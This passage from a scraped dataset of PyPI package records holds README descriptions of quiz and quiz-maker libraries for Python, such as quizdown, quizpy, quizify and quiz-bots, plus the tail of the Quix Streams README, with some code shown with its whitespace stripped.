contentsdf['field_4']=sdf.apply(lambdavalue:value['field_1']+value['field_3'])# Use a stateful function to persist data to the state store and update the value in placesdf=sdf.update(count,stateful=True)# Print the result before producing itsdf=sdf.update(lambdavalue,ctx:print('Producing a message:',value))# Produce the result to the output topicsdf=sdf.to_topic(output_topic)if__name__==\"__main__\":# Run the streaming applicationapp.run(sdf)How It WorksThere are two primary components:StreamingDataFrame- a predefined declarative pipeline to process and transform incoming messages.Application- to manage the Kafka-related setup & teardown and message lifecycle (consuming, committing). It processes each message with the dataframe you provide it.Under the hood, theApplicationwill:Consume a message.Deserialize it.Process it with yourStreamingDataFrame.Produce it to the output topic.Automatically commit the topic offset and state updates after the message is processed.React to Kafka rebalancing updates and manage the topic partitions.Manage the State store.Handle OS signals and gracefully exit the application.More ExamplesYou may find more examples in theexamplesfolderhere.Advanced UsageFor more in-depth description of Quix Streams components, please\nfollow these links:StreamingDataFrame.Serialization.Stateful Processing.Usage with Quix SaaS Platform.Upgrading from Quix Streams <2.0.Using theQuix Platform-Application.Quix()This library doesn't have any dependency on any commercial products, but if you use it together with Quix SaaS Platform you will get some advantages out of the box during your development process such as:Auto-configuration.Monitoring.Data explorer.Data persistence.Pipeline visualization.Metrics.and more.Quix Streams provides a seamless integration with Quix Platform viaApplication.Quix()class.\nThis class will automatically configure the Application using Quix SDK Token.If you are running this within the Quix platform it will be configured\nautomatically.Otherwise, please seeQuix Platform Configuration.What's NextThis library is being actively developed.Here are some of the planned improvements:Windowed aggregations over Tumbling & Hopping windowsState recovery based on Kafka changelog topicsWindowed aggregations over Sliding windowsGroup-bys and joins (for merging topics/keys)Support for \"exactly-once\" Kafka processing (aka transactions)Support for Avro and Protobuf formatsSchema Registry supportTo find out when the next version is ready, make sure you watch this repo\nand join ourQuix Community on Slack!Contribution GuideContributing is a great way to learn and we especially welcome those who haven't contributed to an OSS project before.We're very open to any feedback or code contributions to this OSS project \u2764\ufe0f.Before contributing, please read ourContributingfile for how you can best give feedback and contribute.Need help?If you run into any problems, please create anissueor ask in #quix-help in ourQuix Community on Slack.Community \ud83d\udc6dJoin other software engineers inThe Stream, an online community of people interested in all things data streaming. This is a space to both listen to and share learnings.\ud83d\ude4cJoin our Slack community!LicenseQuix Streams is licensed under the Apache 2.0 license. View a copy of the License filehere.Stay in touch \ud83d\udc4bYou can follow us onTwitterandLinkedinwhere we share our latest tutorials, forthcoming community events and the occasional meme.If you have any questions or feedback - write to us atsupport@quix.io!"} +{"package": "quiz", "pacakge-description": "Capable GraphQL client for Python.Features:Sync/async compatible, pluggable HTTP clients.Auto-generate typed and documented python APIsORM-like syntax to write GraphQL.Note that this project is in an early alpha stage.\nSome features are not yet implemented (see the roadmap below),\nand it may be a little rough around the edges.\nIf you encounter a problem or have a feature request,\ndon\u2019t hesitate to open an issue in theissue tracker.QuickstartA quick \u2018n dirty request to GitHub\u2019s new V4 API:>>>importquiz>>>query='''\n... {\n... repository(owner: \"octocat\", name: \"Hello-World\") {\n... createdAt\n... description\n... }\n... }\n... '''>>>quiz.execute(query,url='https://api.github.com/graphql',...auth=('me','password')){\"repository\":...}FeaturesAdaptability. Built on top ofsnug,\nquiz supports different HTTP clientsimportrequestsresult=quiz.execute(query,...,client=requests.Session())as well as async execution\n(optionally withaiohttp):result=awaitquiz.execute_async(query,...)Typing.\nConvert a GraphQL schema into documented python classes:>>>schema=quiz.Schema.from_url('https://api.github.com/graphql',...auth=('me','password'))>>>help(schema.Repository)classRepository(Node,ProjectOwner,Subscribable,Starrable,UniformResourceLocatable,RepositoryInfo,quiz.types.Object)|Arepositorycontainsthecontentforaproject.||Methodresolutionorder:|...||Datadescriptorsdefinedhere:||assignableUsers|:UserConnection|Alistofusersthatcanbeassignedtoissuesinthisrepo||codeOfConduct|:CodeOfConductorNone|Returnsthecodeofconductforthisrepository...GraphQL \u201cORM\u201d. Write queries as you would with an ORM:>>>_=quiz.SELECTOR>>>query=schema.query[..._....repository(owner='octocat',name='Hello-World')[..._....createdAt....description...]...]>>>str(query)query{repository(owner:\"octocat\",name:\"Hello-World\"){createdAtdescription}}Offline query validation. Use the schema to catch errors quickly:>>>schema.query[..._....repository(owner='octocat',name='Hello-World')[..._....createdAt....foo....description...]...]SelectionError:SelectionErroron\"Query\"atpath\"repository\":SelectionError:SelectionErroron\"Repository\"atpath\"foo\":NoSuchField:fielddoesnotexistDeserialization into python objects. Responses are loaded into the schema\u2019s types.\nUse.to access fields:>>>r=quiz.execute(query,...)>>>r.repository.description\"My first repository on GitHub!\">>>isinstance(r.repository,schema.Repository)TrueIf you prefer the raw JSON response, you can always do:>>>quiz.execute(str(query),...){\"repository\":...}Installationquizand its dependencies are pure python. Installation is easy as:pipinstallquizContributingAfter you\u2019ve cloned the repo locally, set up the development environment\nwith:makeinitFor quick test runs, run:pytestTo run all tests and checks on various python versions, run:maketestGenerate the docs with:makedocsPull requests welcome!Preliminary roadmapFeaturestatusInput objectsplannedbetter query validation errorsplannedmore examples in docsplannedexecuting selection sets directlyplannedintrospection fields (i.e.__typename)plannedcustom scalars for existing types (e.g.datetime)plannedimprove Object/Interface APIplannedvalue object docsplannedMutations & subscriptionsplannedInline fragmentsplannedFragments and fragment spreadsplannedpy2 unicode robustnessplannedMixing in raw GraphQLplannedModule autogenerationplannedType inference (e.g. enum values)plannedVariablesplannedDirectivesplannedInteger 32-bit limitplannedconverting names from camelcase to snake-caseideaAutogenerate module .rst from schemaideaAutogenerate module .py from schemaideaEscaping python keywordsideaHandling markdown in descriptionsideaWarnings when using deprecated fieldsideaHandle optional types descriptions in schemaideaReturning multiple validation errors at the same timeideaExplicit orderingidea"} +{"package": "quizapi", "pacakge-description": "QuizAPIA wrapper around theQuizAPIapi\ndesigned for an object oriented usage, with great type supportFeatures100% typehinted codebaseExcellent autocompletion and editor supportFully testedBlocking and Async (thanks toinstant-api-client)"} +{"package": "quizapp", "pacakge-description": "QuizappThe quizzing app is an interactive application that enables teachers to create and manage quizzes, and students to take each quiz. Each quiz must be multiple choice and contain a single answer. Upon quiz completion, students can view their quiz score and score averaged across all quizzes. Teachers can view all student quiz scores. Some features of quizapp include:The student selecting which course they want to take a quiz for.Saving the students score for each quiz and storing in a file for a given course.Outputting the student's average quiz score of all quizzes taken by a given student to the screen.Teachers can create new quizzes.Teachers can view and modify student quiz scores.Teachers can calculate and display overall quiz statistics for any courseProject StructureMain package name isquizapp. It contains amain.pymodule and two sub-packages:studentandteacher. The student sub-package contains two modules:readquiz.pyandtakequiz.py. The teacher sub-package contains two modules:createquiz.pyandcheckstudentscores.py. There is an assets directory which contains data files for quizzes and scores.student sub-packageThe student sub-package contains two modules to handle the flows that a student user will interact with:readquiz.py:This module involves reading individual quizzes, enabling student users to complete them. This is accomplished with 2 classes and 4 functions:class Quiz:This consists of a quiz object with three attributes, thename(i.e. course code) of a quiz, the individualproblemsin a quiz, and the totalnumber of problems.class Problem:This consists of a problem object with three attributes, thequestionitself, the multiple choiceoptionsfor a question, and theanswer.read_quiz():Individual quizzes stored as json files are outputted to the screenget_available_courses():Lists all available quizzes students can takesave_score():Saves the score a student achieved into a csv file of student quiz scoresget_percentage():Converts a students quiz score into a percentage.takequiz.py:This module handles the flow of student users taking quizzes. This is accomplished with 1 classes and 3 functions:class Student:This consists of a student object with two attributes,student nameandstudent numberstudent_handler():Initializes a student's name and number into a Student class objectstart_quiz():The function where a student actually completes the quizselect_quiz():Displays all available quizzes then prompts a student to select a quiz to complete.teacher sub-packageThe teacher sub-package contains module to handle the flows that a user with teacher role will interact with. It contains two modules:createquiz.py:This module handles the workflow of creating a quiz through an interactive menu through which a teacher can add a quiz for a course. It achieves this using the following methods:create_quiz():This serves as a driver function to create a quiz and then writes the quiz into a JSON file in the appropriate directory with the appropriate filename.questionInput():Takes the user input for questions, options and the answer and creates an object for the same.create_score_csv():Creates a template score file whenever a new quiz is added. After each student has taken the quiz, their score is saved to the file created using this method.convert_to_json():Converts the quiz from a dictionary object to JSON object and writes object into a JSON file.checkstudentscores.py:This module handles the workflow of viewing the scores for the quiz by the teacher and also allows them to view other statistics like mean, minimum, maximum etc. It achieves this using the following methods:get_student_scores():It displays the student's quiz score for a course by taking student number and course code as arguments.set_student_scores():It modifies the student's score if there is an error in the quiz.quiz_score_statistics():It calculates and display metrics like average, minimum, maximum etc. for the course grade of all students.score_driver():This is the driver method allowing the teacher to view a students mark, modify a students mark, calculate quiz summary statistics, or leave the program.quiz_or_score():This is the driver method directing teacher to create a quiz, check quiz score marks, or leave the program"} +{"package": "quiz-bots", "pacakge-description": "Bots for quizDescriptionThis repository contains Vk and TG bots for the quiz. They get used to the questions and check the correctness of the answers to them.Bot examples:Tg botVk bot- write a message \"\u041d\u043e\u0432\u044b\u0439 \u0432\u043e\u043f\u0440\u043e\u0441\" to the groupTable of contentInstallationHow to useLicenseProject goalInstallationInstall usingpip:pipinstallquiz-botsCreate a bot in Telegram viaBotFather, and get it API token.Create redis account inRedislabs, and after that createcloud database(you can choose free plan).\nGet your endpoint database url and port.Create VK's group, allow it send messages, and get access token for it.Register environment variables in the operating system:exportTELEGRAM_TOKEN=telegram_tokenexportDB_ENDPOINT=redisendpointexportDB_PASSWORD=redis_passwordexportVK_GROUP_TOKEN=token_vkontaktePut the question files in a folder(sample files are in the repository folderquiz_files_example) and export quiz content to Redis:quiz-botsexport_quiz_content[path_to_questions_folder]How to useRun TG bot:quiz-botstg-botRun VK bot:quiz-botsvk-botLicenseThis project is licensed under the MIT License - see theLICENSE.mdfile for detailsProject GoalThe code is written for educational purposes on online-course for\nweb-developersdvmn.org."} +{"package": "quizdown", "pacakge-description": "quizdownMarkdown, but for creating multiple-choice quizzes. Especially helpful if you routinely want syntax-highlighting in your question, answers, or distractors.Try alive version (beta)on my website.Off-line Quick-StartInstall (from PyPI)Maybe in a virtualenv? This may need to bepip3.pipinstallquizdownPreview a Markdown file in the browser.python-mquizdown01_syllabus.md--output01_syllabus.html--browserExport to Moodle:# Use the .moodle extensionpython-mquizdown01_syllabus.md--output01_syllabus.moodle# If you'd rather .xml:python-mquizdown01_syllabus.md--format=moodle--output01_syllabus.xmlMore options:python -m quizdown --help\nusage: quizdown MARKDOWN_FILE --output (out.moodle|preview.html)\n\npositional arguments:\n INPUT_FILE Markdown file containing quiz questions.\n\noptional arguments:\n -h, --help show this help message and exit\n --output OUTPUT_FILE Where to save the processed output: a .moodle or .html\n extension.\n --format {HtmlSnippet,HtmlFull,MoodleXml}\n Output format, if we cannot figure out from file\n extension.\n --name QUIZ_NAME This is the name of the quiz or question category upon\n import. INPUT_FILE if not defined.\n --theme SYNTAX_THEME Syntax highlighting-theme; default=InspiredGitHub\n {'Solarized (dark)', 'base16-ocean.light',\n 'base16-ocean.dark', 'base16-eighties.dark',\n 'Solarized (light)', 'InspiredGitHub',\n 'base16-mocha.dark'} available.\n --lang LANG Language string to assume for syntax-highlighting of\n un-marked code blocks; default='text'; try 'python' or\n 'java'.\n --browser Directly open a preview in the default web-browser.What isquizdown?This is a tool for quickly specifying 5-20 multiple choice questions in a markdown subset. Right now you can export to both MoodleXML and HTML.Why would I use this over Moodle's built-in editor?Less clicks! Make as many questions as you want with just your keyboard. Then import them in bulk to a \"Question Bank\" and then from there to a new \"Quiz\".You teach CS/Data Science/STEM and you want or NEED somegoodsyntax highlighting for your class.Sane defaults: all questions are \"select as many as apply\", with no partial credit.LimitationsONLY Multiple choice questions are supported.Any partial credit must be done post-export via Moodle.No way to upload images. You could theoretically embed SVG and base64 images but I haven't looked into it.Error messages are limited (I just figured out how to get position information from the markdown library; need to sprinkle it through). For now, treat it like LaTeX: binary search for your errors ;pRoadmapOther question types, e.g., Essay questions? #1Better error messages. (No line/col or question # information right now) #2QTI/Blackboard export support. #3File an issue:https://github.com/jjfiv/quizdown/issuesHow to write a bunch of questions (in words):Use headings (whatever level you want; be consistent) to separate questions.Questions end with a github-style task list -- if you want moodle to shuffle, use unordered lists, otherwise make them ordered.Tasks marked as \"complete\" are correct answers.We're building onpulldown_cmark; a CommonMark-compatible markdown implementation with the \"github tables\" \"github task lists\" and \"strikethrough\" extensions.ExampleSource QuestionLet's imagine we're teaching Python and want to make sure students (A) understand list-append, and (B) remember that lists should never be used as default arguments.### A. Python Lists\n\n```python\nxs = [1,2,3]\nxs.append(7)\nprint(sum(xs))\n```\n\nWhat gets printed?\n\n1. [ ] It's impossible to know.\n1. [x] 13\n1. [ ] Something else.\n\n\n### B. Python Lists and Default Arguments\n\n```python\ndef take_default_list(xs = []):\n xs.append(7)\n return sum(xs)\n```\n\nWhat is the output of ``take_default_list([1,2,3])``?\n\n1. [x] It's impossible to know.\n1. [ ] 13\n1. [ ] Something else.Example (rendered)I have a private github repo for each class, with files labeled by lecture number and topic, e.g.,05_Lists.md-- Any old Markdown renderer is close enough for 99% of questions.Here's someone's README.md rendering of the above example questions.A. Python Listsxs=[1,2,3]xs.append(7)print(sum(xs))What gets printed?It's impossible to know.13Something else.B. Python Lists and Default Argumentsdeftake_default_list(xs=[]):xs.append(7)returnsum(xs)What is the output oftake_default_list([1,2,3])?It's impossible to know.13Something else.Why'd you write this in Rust?Because my first version (in Python w/BeautifulSoup) was a bit of a disaster, maintenance-wise. Also, I wanted to have the ability to host an editor online. So this one compiles to WASM."} +{"package": "quizdrill", "pacakge-description": "A learning-by-testing program to learn quickly, mostly memorizingtasks like vocabulary. Quizdrill supports multiple choice, simple\nquiz as well as flashcard testing. Although still quite primitive\nQuizdrill asks questions which have been answered right more often\nthen others more often to improve learning efficiency. Quizzes can\nbe easily created by edition simple text files or automatically built\nfrom Infobox-style templates of Wikipedia dumps (or other MediaWikis\nand even Semantic MediaWikis)."} +{"package": "quizicist", "pacakge-description": "No description available on PyPI."} +{"package": "quizify", "pacakge-description": "Quizify - A Quiz AppDescriptionThis is a cli quiz app that allows users to take a quiz and assess their knowledge on a particular topic.\nIt reads questions from csv files and presents them to the user. The user can then select an answer.\nAt the end of the quiz, the user is presented with their score.RequirementsPython 3.10 or higherInstallationOption 1Clone the repo:git clone https://github.com/Kamran151199/quizify.gitNavigate to the project directory:cd quizifyRunpoetry installto install dependenciesRunpoetry run quizifyto start the appOption 2Install from PyPi:pip install quizifyRunquizifyto start the appRunquizify --helpto see available optionsSchema of CSV filesQuestionsThe questions csv file should have the following columns:question: The question to be askedanswer: The correct answer to the questionoptions: The options separated by;(semi-colon)level: Any meta data that you want to show to the user after the question has been answeredScore PenaltyThe score penalty csv file should have the following columns:level: The level of the questionpenalty: The penalty to be applied to the score if the question is answered incorrectlyExample CSV filesquestions.csvscore_penalty_config.csvExample Usagequizify --helpto see available optionsquizify --score-penalty=score_penalty_config.csv --questions=questions.csvto start the app with custom config\nand questions.quizify --score-penalty=score_penalty_config.csv --questions=questions.csv --shuffleto start the app with custom\nconfig\nand questions and shuffle the questions.quizify --score-penalty=score_penalty_config.csv --questions=questions.csv --shuffle --with-metato start the app\nwith custom config\nand questions and shuffle the questions and show meta data."} +{"package": "quizii1", "pacakge-description": "quizzquizzz\u10db\u10dc\u10d8\u10e8\u10d5\u10dc\u10d4\u10da\u10dd\u10d1\u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e2\u10d0\u10dc\u10d0\u10d3 \u10e3\u10dc\u10d3\u10d0 \u10d2\u10d0\u10db\u10dd\u10d5\u10d8\u10eb\u10d0\u10ee\u10dd\u10d7 fib_next \u10ea\u10d5\u10da\u10d0\u10d3\u10d8, print \u10d0\u10e0 \u10e1\u10ed\u10d8\u10e0\u10d3\u10d4\u10d1\u10d0."} +{"package": "quizium-prompt", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quizler", "pacakge-description": "No description available on PyPI."} +{"package": "quizlet-sets", "pacakge-description": "quizlet-sets - A library to download Quizlet study setsUsage:Install it useingpip3 install quizlet-sets. [WIP, only have example code]fromquizlet_setsimportsetsURL=\"https://quizlet.com/686459638/test-set-flash-cards/?new\"# Sample study setset=sets.get_terms(URL)# Returns a TermList objectname=\"Sample set\"# There are a few different ways to export study sets.set.txt(name)set.xls(name)set.csv(name)set.anki(name,\"deck name\")"} +{"package": "quizlet-sets-ashton0223", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quizli", "pacakge-description": "An educational project teaching how to open-source an interactive Python quiz appquizliProject StatsDocumentationBuild statusActivity & Issue TrackingPyPINews & UpdatesDemo:mortar_board: Learning GuideThis guide teaches you how to effectively share a Python app with the open-source community.Learning GuideInteractive quiz appHow to create an interactive Python quiz app?Command Line InterfaceHow to add a CLI to your quiz app?DocumentationHow to create a slick documentation for your app?PublishingHow to build, manage and publish your Python package to PyPi?TestingHow to test your app?:rocket: User GuideThis guide contains usage and reference material for thequizliapp.User GuideCLI ReferenceUsage & reference forquizli'sCLICode ReferenceUsage & reference forquizli'ssource codeQuickstart:package: InstallationInstall quizli withpip:pip install quizli:zap: EntrypointTo get help aboutquizli'scommands open your console and type:quizli --helpThe same works for subcommands, e.g. :quizli demo --help"} +{"package": "quizlight", "pacakge-description": "Quizlight is simple terminal-based program for test taking and creation. It is written in Python 3. It comes with a Python 3 test module, based onThe Python Tutorial.Optionsusage: quizlight.py [-h] [\u2013version] [-d DIRECTORY] [\u2013learn] [file]positional arguments:file set the module import fileoptional arguments:-h,--helpshow this help message and exit--versionshow program\u2019s version number and exit-dDIRECTORYset the module import directory--learnturn on learning mode (immediate answer feedback)InterfaceQuizlight has a menu driven interface, based on the lightcli library. There are two modes: test mode, and edit mode. Test mode is for taking tests. Edit mode is for creating and editing tests.LinksDocumentationChangelog"} +{"package": "quizmake", "pacakge-description": "A question generator I made for the University of Guelph.Despite developing this for Moodle, it should support anything that can take its export formats.Questions are randomized from token files that are called dynamically by the user.The user scripts the questions using a simple three-part file format to be covered later.https://github.com/alvations/QuotablesInstallationIf you usepip3, you can install it by doing>>> pip3 install quizmakeAlternatively, you may install this repo locally by cloning it and running>>> pip3 install -e .InformationPyPi:https://pypi.org/project/quizmake/Github:https://github.com/jnguyen1098License: MIT LicenseHeaderLorem ipsumdolor sitamet.Lorem ipsumdolor sit ametLorem ipsumdolor sit ametgoogleverbatimTitlesubtitlesubsubtitleLmaoIf under and overline are used, their length must be identical# with overline, for partswith overline, for chapters=, for sections-, for subsections^, for subsubsections\u201c, for paragraphsThis is a bulleted list.It has two items, the second\nitem uses two lines. (note the indentation)This is a numbered listIt also has two itemsThis is also a numbered listBut it doesn\u2019t use explicit numberingCode block testlmao\nfor (int i = 0; i < 10; i++) {\n puts(\"lmao\");\n}Also a test>>> TestWhat your project doesHow to install itExample usageHow to set up the dev. environmentHow to ship a changeChangelogLicense inforaw.githubusercontent.com/dbader/readme-template/master/README.md"} +{"package": "quiz-maker", "pacakge-description": "No description available on PyPI."} +{"package": "quizmaker3000", "pacakge-description": "No description available on PyPI."} +{"package": "quizofit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quiz-publish", "pacakge-description": "No description available on PyPI."} +{"package": "quizpy", "pacakge-description": "quizpyThis package allows you to create a Moodle Quiz in Python code, which then can be imported via the XML import.Stop fumbling aroundwith the horrible moodle web interface!Start coding and use version control!So far many of the existing question types are supported:Multiple ChoiceMultiple True-FalseNumericalShortAnswerMatchingDrag & Drop on ImagesClozeEssayDescriptionsInstallationQuizpy is available on PyPi and can be installed via pip:pip install quizpyUsageA moodle quiz (more specifically a question catalogue) consists of multiple categories that need to be filled\nwith questions. EachQuestionhas at least a title, a question text and some default points (which can be\nscaled in the actual quiz on moodle). Further customizations depend on the question type.A minimal 2-question example might look like this:fromquizpyimportQuiz,Category,MultipleChoice,Essay,Choicemc=MultipleChoice(\"Question Title\",'Is this a question?',1.0)mc.add_choice('Yes',100.00,'Correct, horse!')mc.add_choice('No',-100.00,'Na-ahh')mc.add_choice('Maybe?',0.0,'Na-ahh')blabber=Essay(\"Psychology Question\",\"How does coding an exam make you feel?\",1.0,response_template=\"Great!\")example_quiz=Quiz()example_questions=example_quiz.add_category(\"Example questions\")example_questions.questions.extend([mc,blabber])example_quiz.export('example_quiz.xml')DocumentationA full documentation can be found onReadTheDocs.\nPlease, also have a look in theexamplesfolder to quickly see how a question type is used."} +{"package": "quizpython", "pacakge-description": "No description available on PyPI."} +{"package": "quizr_utilities", "pacakge-description": "UNKNOWN"} +{"package": "quizstarr", "pacakge-description": "Quizz Starr!!!This is a simple CLI app.\nIt generates randoms questions from Open Trivia API and stores the generated questions in json in question.json (multiple choice and boolean questions)Each user is able to signup/login and choose the number of questions he/she wants to answer.REQUIREMENTsPython 3.8PyPIINSTALLDownload python 3.8 (add python to path during installation)pip install quizstarrPLAY/RUNopen cmd as an administratorinput python -m quizstarr"} +{"package": "quizz", "pacakge-description": "quizzWrappers around Python's print and input functions to create question/answer themed command line applications. Seeexamplesfolder for real life applications.DocumentationInstallationSimply install using pip:pip install quizzquizz supports Python version 3.7 and onwards.Basic usageHere is a basic snippet. It will prompt for the user's name and\noutput it in a formatted sentence, try running it yourself:fromquizzimportQuestionquestion=Question(\"What is your name?\")question.ask()print(\"Your name is: \"+question.answer)As you can see, this is not very useful. We could have constructed same\nprogram withinputfunction as well. As we discover more onQuestionwe will see how to exploit it to construct more useful question clauses.\nIf you run this snippet you will see that it behaves a bit different frominputfunction:It will re-ask the question in case of an empty answerIt will strip spaces from the answerThis is due to defaultQuestionconfiguration (namely question scheme).\nThese behaviour can be customized and respectively correspond torequiredandstripfields.Question fieldsThere are bunch of fields that define a behaviour of a question. Lets\nsee each of these options and what they do:promptThe prompt of the question.validatorsA list that contains validators or callable objects which will validate the given answers.\nSee Validators section to learn more.optionsList ofOptionobjects. See Options section to learn more.commandsA list that containsCommandclasses or objects. These commands will be available\nin this questions context. See Commands section to learn more.correct_answersA list of strings that are counted as correct answers. The valuehas_correct_answerofQuestionobjects will depend on this list. If the correct answer is anOptionobject, the string must correspond tovalueof the option rather than theexpression.Example:question=Question(\"1+2?\",correct_answers=[\"3\"])question.ask()# Assuming the answer was correct, this will be True:is_correct=question.has_correct_answerextraA user defined dictionary that contains any other extra information about the question.\nThis is useful especially in aQuizcontext if you want to create relations between\nquestions with any arbitrary data. For example, let's say you set up a quiz in which\neach question has its own points. In this case you can assign point value to each question\nthrough this field.requiredTrueA boolean, ifTruemarks the question as required. Required questions will be asked\nuntil the user provides a non-empty input. Otherwise the question can be left blank (in which\ncase the answer attribute of the question object will be None).stripTrueA boolean, if set toTruewill callstripfunction for the given input.suffixA string that will be appended to the given prompt.prefixA string that will be prepended to the given prompt.command_delimiter!A string that will mark the start of a command. See Commands section to learn more.option_indicator)A string that will determines the indicator for options. For example if set\nto]options will be outputted asvalue] expressionMultipleChoiceQuestion specific fieldschoicesA list of strings from whichOptionobjects will be generated and added to\nthe question object. The values of options will be determined by thestyleorstyle_iteratorfields.styleletterA string that will determine the style of option values. It can be one of these:letter,letter_uppercase,number,number_fromzero. These styles are quite self\nexplanatory.style_iteratorAn iterable that will determine the style of option values. If provided, this will\noverridestylefield. Useful if you want a custom style.displayhorizontalThe display style of options and values. Built-in displays arehorizontalandvertical.\nYou may implement your own display by extending MultipleChoiceQuestion. See extending section\nto learn more.Scheme objectsAs it can be seen, there are quite several fields to define a behaviour ofQuestion.\nBut this can be tedious if you want to use same fields for multiple questions.\nThis is whereSchemeobjects come in handy.Schemeobjects can be defined just likeQuestionobjects, expectpromptfield is not required. For example:my_scheme=Scheme(required=False,commands=[Help,Skip])question=Question(\"Howdy?\",scheme=my_scheme)You can also pass fields forQuestioneven if you assign a scheme. In such case,\nimmutable fields will be overridden. Lists and dictionaries will be extended.\nIf there is a key clash in dictionary, the value given inQuestionfield will be used instead.\nIf the value of field defined inSchemeisNoneit will be discarded (fields ofQuestionwill be used).\nThis behaviour is also true when applying multiple schemes.Quizzes can also take scheme objects. In that case, each question in the\nquiz will have the scheme object mountedafter their initialization. So,\nfor aQuestionthe order ofscheme mounting can be described as:Question fields > Scheme of the Question > Scheme of QuizKeep in mind that a particular scheme will only get mounted once,\nif you want to mount a scheme twice for any reason, you have to useupdate_schemeandupdatemethods whileforceandforce_schemekeyword arguments set toTrue, respectively in the\ncontexts ofQuestionandQuiz.Option objectsMajority of the time, the answer to a question needs to be selected from\na set of options.Optionclass is the way of defining these options. For\nexample:yes,no=Option(value=\"y\",expression=\"Yes\"),Option(value=\"n\",expression=\"No\")question=Question(\"Are you OK?\",options=[yes,no])question.ask()# The answer will be an Option object (yes, no)answer=question.answerIn the example above, if the user inputs anything other than option\nvalues (\"y\" and \"n\"), aValidationErrorwill occur internally and\nthe question will be re-asked.Includingoptionsmeans that the question will no longer accept non-option answers,\nwhile the validators passed through the related field will be discarded.\nAlso, notice that the answer is set as anOptionobject, notstr. All of these behaviour\ncan be changed by overriding thevalidateandmatch_optionmethods ofQuestion.Keep in mind that the fieldcorrect_answersuses thevalueof\ntheOptionto determine whether it is correct or not. This design is so,\nbecause you might not always have theOptionobject around as you most likely\ngenerate it in-line through list comprehensions; just like in the case\nofMultipleChoiceQuestion. If this doesn't convince you, this behaviour\ncan be changed by overridinghas_correct_answerproperty method ofQuestion.Question objectsLet's inspect question objects to find out what we can do with them\nbefore and after the answer has been given.Basic attributesAttributeDescriptionanswerThe answer given to this question, set toNonein case of no/empty answer.attemptNumber of answer attempts this question had. Attempts increase when the question gets re-asked for any reason (e.g. validation errors).quizTheQuizthis question belongs to. Set toNoneif not found in a quiz context.sequenceIndex of this question in an assignedQuiz.mounted_schemesList of schemes that are applied to this question (by any means).has_answerShorthand for:question.answer is not Nonehas_correct_answerReturns a boolean indicating whether the given answer is found incorrect_answersfield.Basic methodsMethodDescriptionaskAsks the questions by calling theinputfunction internally.update_scheme(scheme, force)Mount given scheme object. Ifforceset toTrue, signature of the scheme will be ignored.Signal mechanismsQuestions can get attributes that points to a callable. This callable will be called depending\non the the type of attribute you set. We will call thesesignals. There are currently 2 signals that\ncan be assigned to a question:pre_askandpost_answer. As their names suggest, these signals will\nbe executed just before the question is asked and when the answer attribute is set, respectively.\nThese signals take one argument, theQuestionobject. For example:question=Question(\"Howdy?\")# Set post_answer signal so that the answer is outputted# just as the answer is setquestion.post_answer=lambdaq:print(q.answer)question.ask()Signals can be helpful especially in a quiz context where the order\nof questions might be undetermined. If you want to attach a signal\nto many questions, the example above might be a bit tedious. In such\na case, you can inherit fromQuestionand implementpost_answer(or whichever signal you like) as astaticmethod.Other notes regarding Question objectsAvoid usingoptionsfor MultipleChoiceQuestion as the\nwhole purpose of this class is to abstract away the\nwork onOptionobjects (throughchoices). However,optionsandchoicesare compatible and can be used together.Do not refrain from extending/overridingQuestionclasses\nto add functionality apt to your purposes. They are\ndesigned to be extendable.Quiz objectsQuiz objects are the way of packing a set of questions together. These\nobjects are very useful if you want to build a test-like structure, which\nis generally the case. Apart from asking questions sequentially Quiz objects also\nprovide these functionality:Allows for commands such asNext,PreviousandJumpto traverse through questions.Tracks whether each required or non-required questions are answered via attributesis_readyandis_done, and outputs an info message in appropriate situations.Basic attributesAttributeDescriptionindexThe sequence of question that is being (or going to be) asked.inquiriesThe sum of attempts of questions.questionsThe list of questions on this quiz.schemeThe scheme of this Quiz, if none specified during initialization, this will be the default scheme.is_doneA boolean that indicates whether all the questions on the quiz has an answer.is_readySimilar tois_done, but for required questions only.required_questionsList of required questions.min_inquiriesMinimum number ofQuestionattempts needed before the quiz can be finished.Basic methodsMethodDescriptionstartStarts the quiz by asking the first question.update(force_scheme)Assigns theQuizobject for each question on the quiz, along with its scheme. You need to call this if you mutate the list of questions after initialization.CommandsCommands are provided per-question basis, and they are the way of providing\nmeta. Commands can be executed via specified command delimiter (default!), and\nneed to be present (as classes or objects) incommandsfield.\nYou can create your own commands throughCommandclass. Commands return an\nopcode (throughopcodesenum) which determines what to do after the execution.\nHere are the available opcodes and what they do:opcodeDescriptionCONTINUERe-asks the question.BREAKBreak out of the question loop, thus end the input stream.JUMPQuizReturn this along with a question sequence to ask that question next.Aside from these opcodes, you can also return nothing (None), in which case\nthe question will not be re-asked unless it is required.Built-in commandsCommandExpressionDescriptionopcode(s) returnedSkipskipSet the answer of this question toNoneNoneQuitquitCallssys.exit(0), thus exiting the whole program.N/AHelp(message=\"\", with_command_list=True)helpOutputs given help message. Ifwith_command_listis set toTrue, it will also output list of available commands with their description.CONTINUEJumpjump Jumps to specified question.JUMPNextnextJumps to next question.JUMPPreviouspreviousJumps to previous question.JUMPFinishfinishEnds the quiz provided that all the required questions are answered.BREAKorCONTINUEAnswersanswersOutputs the current answers for each question in the quiz.CONTINUEValidatorsValidators validate the input given to a question.ValidationErroris the\nexception class to be raised when the given input is not valid. Here is an\nexample implementation of a validator:fromquizzimportValidationError,Questiondefvalidate_word_count(answer):# Check if the answer has at least 5 words.count=len(answer.split())ifcount<5:raiseValidationError(\"Your answer needs at least 5 words!\")question=Question(\"Name 5 or more mammals.\",validators=[validate_word_count])The example above will check if the word has at least 5 words. If the\nuser inputs a non-valid string the question will be re-asked until a\nvalid answer has been given.Quizz also provides class-based validators (from which all the built-in validators\ninherit). You can useValidatorclass to create your own class-based validators, which\ncan also take arguments.Built-in validatorsBuilt-in validators are:MaxLengthValidatorMinLengthValidatorAlphaValidatorAlphaNumericValidatorDigitValidatorRegexValidatorBy default, class based validators take two keyword arguments:againstandmessage.againstis the value to be tested against, for exampleMaxLengthValidator's max\nlength orRegexValidator's regex pattern."} +{"package": "quizzer", "pacakge-description": "Break learning up into small task-based tests for focused study.Tests can be defined with prerequites so a student wishing to learn a\nhigher level task, but out of their depth with the task itself, can\neasily go back through the basics. By default, only the leaf\nquestions (i.e. questions that are not dependencies of other question)\nare asked. If the user gets one wrong, we push the question back on\nthe stack (so they can try again later), and also push all of that\nquestions direct dependencies onto 